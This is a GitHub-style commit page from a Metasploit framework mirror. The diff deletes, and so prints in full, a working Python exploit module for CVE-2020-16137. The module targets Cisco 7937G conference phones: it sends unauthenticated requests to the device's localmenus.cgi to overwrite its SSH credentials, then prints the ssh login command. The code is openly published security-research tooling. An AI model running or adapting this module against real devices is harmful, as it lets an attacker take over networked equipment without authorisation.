dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Delete CVE-2020-16137.py 

Linting
This commit is contained in:
debifrank 2020-08-13 09:50:09 -04:00 committed by GitHub
parent 796041ddf4
commit 2a739ed5eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 88 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

88
modules/exploits/linux/ssh/CVE-2020-16137.py
View File

@ -1,88 +0,0 @@
# Exploit Title: Cisco 7937G Prvilege Escalation MSF Module
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Author Homepage: debifrank.github.io
# Organization: BlackLanternSecurity
# Org. Homepage: BlackLanternSecurity.com
# Vendor Homepage: https://cisco.com
# Version: <=SCCP-1-4-5-7
# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7
# CVE: CVE-2020-16137
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# standard modules
import logging
# extra modules
dependency_missing = False
try:
import requests
except ImportError:
dependency_missing = True
from metasploit import module
metadata = {
'name': 'Cisco 7937G SSH Privilege Escalation',
'description': '''
Sets SSH credentials to whatever is supplied.
''',
'authors': [
'Cody Martin'
],
'date': '2020-06-02',
'license': 'GPL_LICENSE',
'references': [
{'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
{'type': 'cve', 'ref': '2020-16137'},
{'type': 'edb', 'ref': '#'}
],
'type': 'single_scanner',
'options': {
'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': ''},
'USER': {'type': 'string', 'description': 'Desired username', 'required': True, 'default': ''},
'PASS': {'type': 'string', 'description': 'Desired password', 'required': True, 'default': ''},
'TIMEOUT': {'type': 'int', 'description': 'Timeout in seconds', 'required': True, 'default': 5}
}
}
def run(args):
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
if dependency_missing:
logging.error('Module dependency (requests) is missing, cannot continue')
return
# Exploit
url = "http://{}/localmenus.cgi".format(args['rhost'])
payload_user = {"func": "403", "set": "401", "name1": args['USER'], "name2": args['USER']}
payload_pass = {"func": "403", "set": "402", "pwd1": args['PASS'], "pwd2": args['PASS']}
logging.info("Attempting to set SSH credentials.")
try:
r = requests.post(url=url, params=payload_user, timeout=int(args['TIMEOUT']))
if r.status_code != 200:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return
r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))
if r.status_code != 200:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return
except requests.exceptions.RequestException:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return
logging.info("SSH attack finished!")
logging.info(("Try to login using the supplied credentials {}:{}").format(args['USER'], args['PASS']))
logging.info("You must specify the key exchange when connecting or the device will be DoS'd!")
logging.info(("ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 {}@{}").format(args['USER'], args['rhost']))
return
if __name__ == "__main__":
module.run(metadata, run)